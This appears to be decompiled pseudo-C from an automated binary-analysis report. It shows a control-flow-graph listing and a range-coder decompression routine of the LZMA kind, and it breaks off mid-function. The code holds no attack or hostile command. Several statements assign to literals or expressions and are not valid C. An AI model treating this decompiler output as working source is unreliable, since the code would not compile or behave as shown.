                                                                    control_flow_graph 589 406d5f-406d64 590 406dd5-406df3 589->590 591 406d66-406d95 589->591 592 4073cb-4073e0 590->592 593 406d97-406d9a 591->593 594 406d9c-406da0 591->594 595 4073e2-4073f8 592->595 596 4073fa-407410 592->596 597 406dac-406daf 593->597 598 406da2-406da6 594->598 599 406da8 594->599 600 407413-40741a 595->600 596->600 601 406db1-406dba 597->601 602 406dcd-406dd0 597->602 598->597 599->597 606 407441-40744d 600->606 607 40741c-407420 600->607 603 406dbc 601->603 604 406dbf-406dcb 601->604 605 406fa2-406fc0 602->605 603->604 608 406e35-406e63 604->608 612 406fc2-406fd6 605->612 613 406fd8-406fea 605->613 615 406be3-406bec 606->615 609 407426-40743e 607->609 610 4075cf-4075d9 607->610 616 406e65-406e7d 608->616 617 406e7f-406e99 608->617 609->606 614 4075e5-4075f8 610->614 618 406fed-406ff7 612->618 613->618 622 4075fd-407601 614->622 619 406bf2 615->619 620 4075fa 615->620 621 406e9c-406ea6 616->621 617->621 623 406ff9 618->623 624 406f9a-406fa0 618->624 626 406bf9-406bfd 619->626 627 406d39-406d5a 619->627 628 406c9e-406ca2 619->628 629 406d0e-406d12 619->629 620->622 631 406eac 621->631 632 406e1d-406e23 621->632 640 407581-40758b 623->640 641 406f7f-406f97 623->641 624->605 630 406f3e-406f48 624->630 626->614 633 406c03-406c10 626->633 627->592 642 406ca8-406cc1 628->642 643 40754e-407558 628->643 634 406d18-406d2c 629->634 635 40755d-407567 629->635 636 40758d-407597 630->636 637 406f4e-407117 630->637 648 406e02-406e1a 631->648 649 407569-407573 631->649 638 406ed6-406edc 632->638 639 406e29-406e2f 632->639 633->620 647 406c16-406c5c 633->647 650 406d2f-406d37 634->650 635->614 636->614 637->615 645 406f3a 638->645 646 406ede-406efc 638->646 639->608 639->645 640->614 641->624 652 406cc4-406cc8 642->652 643->614 645->630 653 406f14-406f26 646->653 654 406efe-406f12 646->654 655 406c84-406c86 647->655 656 406c5e-406c62 647->656 648->632 649->614 650->627 650->629 652->628 657 406cca-406cd0 652->657 660 406f29-406f33 653->660 654->660 663 406c94-406c9c 655->663 664 406c88-406c92 655->664 661 406c64-406c67 GlobalFree 656->661 662 406c6d-406c7b GlobalAlloc 656->662 658 406cd2-406cd9 657->658 659 406cfa-406d0c 657->659 665 406ce4-406cf4 GlobalAlloc 658->665 666 406cdb-406cde GlobalFree 658->666 659->650 660->638 667 406f35 660->667 661->662 662->620 668 406c81 662->668 663->652 664->663 664->664 665->620 665->659 666->665 670 407575-40757f 667->670 671 406ebb-406ed3 667->671 668->655 670->614 671->638
                                                                    C-Code - Quality: 98%
                                                                    			E00406D5F() {
                                                                    				unsigned short _t531;
                                                                    				signed int _t532;
                                                                    				void _t533;
                                                                    				void* _t534;
                                                                    				signed int _t535;
                                                                    				signed int _t565;
                                                                    				signed int _t568;
                                                                    				signed int _t590;
                                                                    				signed int* _t607;
                                                                    				void* _t614;
                                                                    
                                                                    				L0:
                                                                    				while(1) {
                                                                    					L0:
                                                                    					if( *(_t614 - 0x40) != 0) {
                                                                    						 *(_t614 - 0x34) = 1;
                                                                    						 *(_t614 - 0x84) = 7;
                                                                    						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                    						L132:
                                                                    						 *(_t614 - 0x54) = _t607;
                                                                    						L133:
                                                                    						_t531 =  *_t607;
                                                                    						_t590 = _t531 & 0x0000ffff;
                                                                    						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                    						if( *(_t614 - 0xc) >= _t565) {
                                                                    							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                    							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                    							 *(_t614 - 0x40) = 1;
                                                                    							_t532 = _t531 - (_t531 >> 5);
                                                                    							 *_t607 = _t532;
                                                                    						} else {
                                                                    							 *(_t614 - 0x10) = _t565;
                                                                    							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                    							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                    						}
                                                                    						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                    							L139:
                                                                    							_t533 =  *(_t614 - 0x84);
                                                                    							L140:
                                                                    							 *(_t614 - 0x88) = _t533;
                                                                    							goto L1;
                                                                    						} else {
                                                                    							L137:
                                                                    							if( *(_t614 - 0x6c) == 0) {
                                                                    								 *(_t614 - 0x88) = 5;
                                                                    								goto L170;
                                                                    							}
                                                                    							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                    							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                    							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                    							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                    							goto L139;
                                                                    						}
                                                                    					} else {
                                                                    						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                    						__esi =  *(__ebp - 0x60);
                                                                    						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                    						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                    						__ecx =  *(__ebp - 0x3c);
                                                                    						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                    						__ecx =  *(__ebp - 4);
                                                                    						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                    						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                    						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                    						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                    						if( *(__ebp - 0x38) >= 4) {
                                                                    							if( *(__ebp - 0x38) >= 0xa) {
                                                                    								_t97 = __ebp - 0x38;
                                                                    								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                    							} else {
                                                                    								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                    							}
                                                                    						} else {
                                                                    							 *(__ebp - 0x38) = 0;
                                                                    						}
                                                                    						if( *(__ebp - 0x34) == __edx) {
                                                                    							__ebx = 0;
                                                                    							__ebx = 1;
                                                                    							L60:
                                                                    							__eax =  *(__ebp - 0x58);
                                                                    							__edx = __ebx + __ebx;
                                                                    							__ecx =  *(__ebp - 0x10);
                                                                    							__esi = __edx + __eax;
                                                                    							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                    							__ax =  *__esi;
                                                                    							 *(__ebp - 0x54) = __esi;
                                                                    							__edi = __ax & 0x0000ffff;
                                                                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    							if( *(__ebp - 0xc) >= __ecx) {
                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    								__cx = __ax;
                                                                    								_t216 = __edx + 1; // 0x1
                                                                    								__ebx = _t216;
                                                                    								__cx = __ax >> 5;
                                                                    								 *__esi = __ax;
                                                                    							} else {
                                                                    								 *(__ebp - 0x10) = __ecx;
                                                                    								0x800 = 0x800 - __edi;
                                                                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    								__ebx = __ebx + __ebx;
                                                                    								 *__esi = __cx;
                                                                    							}
                                                                    							 *(__ebp - 0x44) = __ebx;
                                                                    							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    								L59:
                                                                    								if(__ebx >= 0x100) {
                                                                    									goto L54;
                                                                    								}
                                                                    								goto L60;
                                                                    							} else {
                                                                    								L57:
                                                                    								if( *(__ebp - 0x6c) == 0) {
                                                                    									 *(__ebp - 0x88) = 0xf;
                                                                    									goto L170;
                                                                    								}
                                                                    								__ecx =  *(__ebp - 0x70);
                                                                    								__eax =  *(__ebp - 0xc);
                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    								_t202 = __ebp - 0x70;
                                                                    								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    								goto L59;
                                                                    							}
                                                                    						} else {
                                                                    							__eax =  *(__ebp - 0x14);
                                                                    							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                    							if(__eax >=  *(__ebp - 0x74)) {
                                                                    								__eax = __eax +  *(__ebp - 0x74);
                                                                    							}
                                                                    							__ecx =  *(__ebp - 8);
                                                                    							__ebx = 0;
                                                                    							__ebx = 1;
                                                                    							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                    							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                    							L40:
                                                                    							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                    							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                    							__ecx =  *(__ebp - 0x58);
                                                                    							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                    							 *(__ebp - 0x48) = __eax;
                                                                    							__eax = __eax + 1;
                                                                    							__eax = __eax << 8;
                                                                    							__eax = __eax + __ebx;
                                                                    							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                    							__ax =  *__esi;
                                                                    							 *(__ebp - 0x54) = __esi;
                                                                    							__edx = __ax & 0x0000ffff;
                                                                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                    							if( *(__ebp - 0xc) >= __ecx) {
                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    								__cx = __ax;
                                                                    								 *(__ebp - 0x40) = 1;
                                                                    								__cx = __ax >> 5;
                                                                    								__ebx = __ebx + __ebx + 1;
                                                                    								 *__esi = __ax;
                                                                    							} else {
                                                                    								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                    								 *(__ebp - 0x10) = __ecx;
                                                                    								0x800 = 0x800 - __edx;
                                                                    								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                    								__ebx = __ebx + __ebx;
                                                                    								 *__esi = __cx;
                                                                    							}
                                                                    							 *(__ebp - 0x44) = __ebx;
                                                                    							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    								L38:
                                                                    								__eax =  *(__ebp - 0x40);
                                                                    								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                    									while(1) {
                                                                    										if(__ebx >= 0x100) {
                                                                    											break;
                                                                    										}
                                                                    										__eax =  *(__ebp - 0x58);
                                                                    										__edx = __ebx + __ebx;
                                                                    										__ecx =  *(__ebp - 0x10);
                                                                    										__esi = __edx + __eax;
                                                                    										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                    										__ax =  *__esi;
                                                                    										 *(__ebp - 0x54) = __esi;
                                                                    										__edi = __ax & 0x0000ffff;
                                                                    										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    										if( *(__ebp - 0xc) >= __ecx) {
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    											__cx = __ax;
                                                                    											_t169 = __edx + 1; // 0x1
                                                                    											__ebx = _t169;
                                                                    											__cx = __ax >> 5;
                                                                    											 *__esi = __ax;
                                                                    										} else {
                                                                    											 *(__ebp - 0x10) = __ecx;
                                                                    											0x800 = 0x800 - __edi;
                                                                    											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    											__ebx = __ebx + __ebx;
                                                                    											 *__esi = __cx;
                                                                    										}
                                                                    										 *(__ebp - 0x44) = __ebx;
                                                                    										if( *(__ebp - 0x10) < 0x1000000) {
                                                                    											L45:
                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                    												 *(__ebp - 0x88) = 0xe;
                                                                    												goto L170;
                                                                    											}
                                                                    											__ecx =  *(__ebp - 0x70);
                                                                    											__eax =  *(__ebp - 0xc);
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											_t155 = __ebp - 0x70;
                                                                    											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    										}
                                                                    									}
                                                                    									L53:
                                                                    									_t172 = __ebp - 0x34;
                                                                    									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                    									L54:
                                                                    									__al =  *(__ebp - 0x44);
                                                                    									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                    									L55:
                                                                    									if( *(__ebp - 0x64) == 0) {
                                                                    										 *(__ebp - 0x88) = 0x1a;
                                                                    										goto L170;
                                                                    									}
                                                                    									__ecx =  *(__ebp - 0x68);
                                                                    									__al =  *(__ebp - 0x5c);
                                                                    									__edx =  *(__ebp - 8);
                                                                    									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                    									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                    									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                    									 *( *(__ebp - 0x68)) = __al;
                                                                    									__ecx =  *(__ebp - 0x14);
                                                                    									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                    									__eax = __ecx + 1;
                                                                    									__edx = 0;
                                                                    									_t191 = __eax %  *(__ebp - 0x74);
                                                                    									__eax = __eax /  *(__ebp - 0x74);
                                                                    									__edx = _t191;
                                                                    									L79:
                                                                    									 *(__ebp - 0x14) = __edx;
                                                                    									L80:
                                                                    									 *(__ebp - 0x88) = 2;
                                                                    									goto L1;
                                                                    								}
                                                                    								if(__ebx >= 0x100) {
                                                                    									goto L53;
                                                                    								}
                                                                    								goto L40;
                                                                    							} else {
                                                                    								L36:
                                                                    								if( *(__ebp - 0x6c) == 0) {
                                                                    									 *(__ebp - 0x88) = 0xd;
                                                                    									L170:
                                                                    									_t568 = 0x22;
                                                                    									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                    									_t535 = 0;
                                                                    									L172:
                                                                    									return _t535;
                                                                    								}
                                                                    								__ecx =  *(__ebp - 0x70);
                                                                    								__eax =  *(__ebp - 0xc);
                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    								_t121 = __ebp - 0x70;
                                                                    								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    								goto L38;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					L1:
                                                                    					_t534 =  *(_t614 - 0x88);
                                                                    					if(_t534 > 0x1c) {
                                                                    						L171:
                                                                    						_t535 = _t534 | 0xffffffff;
                                                                    						goto L172;
                                                                    					}
                                                                    					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                    						case 0:
                                                                    							if( *(_t614 - 0x6c) == 0) {
                                                                    								goto L170;
                                                                    							}
                                                                    							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                    							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                    							_t534 =  *( *(_t614 - 0x70));
                                                                    							if(_t534 > 0xe1) {
                                                                    								goto L171;
                                                                    							}
                                                                    							_t538 = _t534 & 0x000000ff;
                                                                    							_push(0x2d);
                                                                    							asm("cdq");
                                                                    							_pop(_t570);
                                                                    							_push(9);
                                                                    							_pop(_t571);
                                                                    							_t610 = _t538 / _t570;
                                                                    							_t540 = _t538 % _t570 & 0x000000ff;
                                                                    							asm("cdq");
                                                                    							_t605 = _t540 % _t571 & 0x000000ff;
                                                                    							 *(_t614 - 0x3c) = _t605;
                                                                    							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                                    							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                    							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                    							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                    								L10:
                                                                    								if(_t613 == 0) {
                                                                    									L12:
                                                                    									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                    									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                    									goto L15;
                                                                    								} else {
                                                                    									goto L11;
                                                                    								}
                                                                    								do {
                                                                    									L11:
                                                                    									_t613 = _t613 - 1;
                                                                    									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                    								} while (_t613 != 0);
                                                                    								goto L12;
                                                                    							}
                                                                    							if( *(_t614 - 4) != 0) {
                                                                    								GlobalFree( *(_t614 - 4));
                                                                    							}
                                                                    							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                    							 *(_t614 - 4) = _t534;
                                                                    							if(_t534 == 0) {
                                                                    								goto L171;
                                                                    							} else {
                                                                    								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                    								goto L10;
                                                                    							}
                                                                    						case 1:
                                                                    							L13:
                                                                    							__eflags =  *(_t614 - 0x6c);
                                                                    							if( *(_t614 - 0x6c) == 0) {
                                                                    								 *(_t614 - 0x88) = 1;
                                                                    								goto L170;
                                                                    							}
                                                                    							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                    							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                    							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                    							_t45 = _t614 - 0x48;
                                                                    							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                    							__eflags =  *_t45;
                                                                    							L15:
                                                                    							if( *(_t614 - 0x48) < 4) {
                                                                    								goto L13;
                                                                    							}
                                                                    							_t546 =  *(_t614 - 0x40);
                                                                    							if(_t546 ==  *(_t614 - 0x74)) {
                                                                    								L20:
                                                                    								 *(_t614 - 0x48) = 5;
                                                                    								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                    								goto L23;
                                                                    							}
                                                                    							 *(_t614 - 0x74) = _t546;
                                                                    							if( *(_t614 - 8) != 0) {
                                                                    								GlobalFree( *(_t614 - 8));
                                                                    							}
                                                                    							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                    							 *(_t614 - 8) = _t534;
                                                                    							if(_t534 == 0) {
                                                                    								goto L171;
                                                                    							} else {
                                                                    								goto L20;
                                                                    							}
                                                                    						case 2:
                                                                    							L24:
                                                                    							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                    							 *(_t614 - 0x84) = 6;
                                                                    							 *(_t614 - 0x4c) = _t553;
                                                                    							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                    							goto L132;
                                                                    						case 3:
                                                                    							L21:
                                                                    							__eflags =  *(_t614 - 0x6c);
                                                                    							if( *(_t614 - 0x6c) == 0) {
                                                                    								 *(_t614 - 0x88) = 3;
                                                                    								goto L170;
                                                                    							}
                                                                    							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                    							_t67 = _t614 - 0x70;
                                                                    							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                    							__eflags =  *_t67;
                                                                    							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                    							L23:
                                                                    							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                    							if( *(_t614 - 0x48) != 0) {
                                                                    								goto L21;
                                                                    							}
                                                                    							goto L24;
                                                                    						case 4:
                                                                    							goto L133;
                                                                    						case 5:
                                                                    							goto L137;
                                                                    						case 6:
                                                                    							goto L0;
                                                                    						case 7:
                                                                    							__eflags =  *(__ebp - 0x40) - 1;
                                                                    							if( *(__ebp - 0x40) != 1) {
                                                                    								__eax =  *(__ebp - 0x24);
                                                                    								 *(__ebp - 0x80) = 0x16;
                                                                    								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                    								__eax =  *(__ebp - 0x28);
                                                                    								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                    								__eax =  *(__ebp - 0x2c);
                                                                    								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                    								__eax = 0;
                                                                    								__eflags =  *(__ebp - 0x38) - 7;
                                                                    								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                    								__al = __al & 0x000000fd;
                                                                    								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                    								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                    								__eax =  *(__ebp - 4);
                                                                    								__eax =  *(__ebp - 4) + 0x664;
                                                                    								__eflags = __eax;
                                                                    								 *(__ebp - 0x58) = __eax;
                                                                    								goto L68;
                                                                    							}
                                                                    							__eax =  *(__ebp - 4);
                                                                    							__ecx =  *(__ebp - 0x38);
                                                                    							 *(__ebp - 0x84) = 8;
                                                                    							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                    							goto L132;
                                                                    						case 8:
                                                                    							__eflags =  *(__ebp - 0x40);
                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                    								__eax =  *(__ebp - 4);
                                                                    								__ecx =  *(__ebp - 0x38);
                                                                    								 *(__ebp - 0x84) = 0xa;
                                                                    								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                    							} else {
                                                                    								__eax =  *(__ebp - 0x38);
                                                                    								__ecx =  *(__ebp - 4);
                                                                    								__eax =  *(__ebp - 0x38) + 0xf;
                                                                    								 *(__ebp - 0x84) = 9;
                                                                    								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                    								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                    							}
                                                                    							goto L132;
                                                                    						case 9:
                                                                    							__eflags =  *(__ebp - 0x40);
                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                    								goto L89;
                                                                    							}
                                                                    							__eflags =  *(__ebp - 0x60);
                                                                    							if( *(__ebp - 0x60) == 0) {
                                                                    								goto L171;
                                                                    							}
                                                                    							__eax = 0;
                                                                    							__eflags =  *(__ebp - 0x38) - 7;
                                                                    							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                    							__eflags = _t258;
                                                                    							0 | _t258 = _t258 + _t258 + 9;
                                                                    							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                    							goto L75;
                                                                    						case 0xa:
                                                                    							__eflags =  *(__ebp - 0x40);
                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                    								__eax =  *(__ebp - 4);
                                                                    								__ecx =  *(__ebp - 0x38);
                                                                    								 *(__ebp - 0x84) = 0xb;
                                                                    								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                    								goto L132;
                                                                    							}
                                                                    							__eax =  *(__ebp - 0x28);
                                                                    							goto L88;
                                                                    						case 0xb:
                                                                    							__eflags =  *(__ebp - 0x40);
                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                    								__ecx =  *(__ebp - 0x24);
                                                                    								__eax =  *(__ebp - 0x20);
                                                                    								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                    							} else {
                                                                    								__eax =  *(__ebp - 0x24);
                                                                    							}
                                                                    							__ecx =  *(__ebp - 0x28);
                                                                    							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                    							L88:
                                                                    							__ecx =  *(__ebp - 0x2c);
                                                                    							 *(__ebp - 0x2c) = __eax;
                                                                    							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                    							L89:
                                                                    							__eax =  *(__ebp - 4);
                                                                    							 *(__ebp - 0x80) = 0x15;
                                                                    							__eax =  *(__ebp - 4) + 0xa68;
                                                                    							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                    							goto L68;
                                                                    						case 0xc:
                                                                    							L99:
                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                    								 *(__ebp - 0x88) = 0xc;
                                                                    								goto L170;
                                                                    							}
                                                                    							__ecx =  *(__ebp - 0x70);
                                                                    							__eax =  *(__ebp - 0xc);
                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							_t334 = __ebp - 0x70;
                                                                    							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                    							__eflags =  *_t334;
                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							__eax =  *(__ebp - 0x2c);
                                                                    							goto L101;
                                                                    						case 0xd:
                                                                    							goto L36;
                                                                    						case 0xe:
                                                                    							goto L45;
                                                                    						case 0xf:
                                                                    							goto L57;
                                                                    						case 0x10:
                                                                    							L109:
                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                    								 *(__ebp - 0x88) = 0x10;
                                                                    								goto L170;
                                                                    							}
                                                                    							__ecx =  *(__ebp - 0x70);
                                                                    							__eax =  *(__ebp - 0xc);
                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							_t365 = __ebp - 0x70;
                                                                    							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                    							__eflags =  *_t365;
                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							goto L111;
                                                                    						case 0x11:
                                                                    							L68:
                                                                    							__esi =  *(__ebp - 0x58);
                                                                    							 *(__ebp - 0x84) = 0x12;
                                                                    							goto L132;
                                                                    						case 0x12:
                                                                    							__eflags =  *(__ebp - 0x40);
                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                    								__eax =  *(__ebp - 0x58);
                                                                    								 *(__ebp - 0x84) = 0x13;
                                                                    								__esi =  *(__ebp - 0x58) + 2;
                                                                    								goto L132;
                                                                    							}
                                                                    							__eax =  *(__ebp - 0x4c);
                                                                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                    							__ecx =  *(__ebp - 0x58);
                                                                    							__eax =  *(__ebp - 0x4c) << 4;
                                                                    							__eflags = __eax;
                                                                    							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                    							goto L130;
                                                                    						case 0x13:
                                                                    							__eflags =  *(__ebp - 0x40);
                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                    								_t469 = __ebp - 0x58;
                                                                    								 *_t469 =  *(__ebp - 0x58) + 0x204;
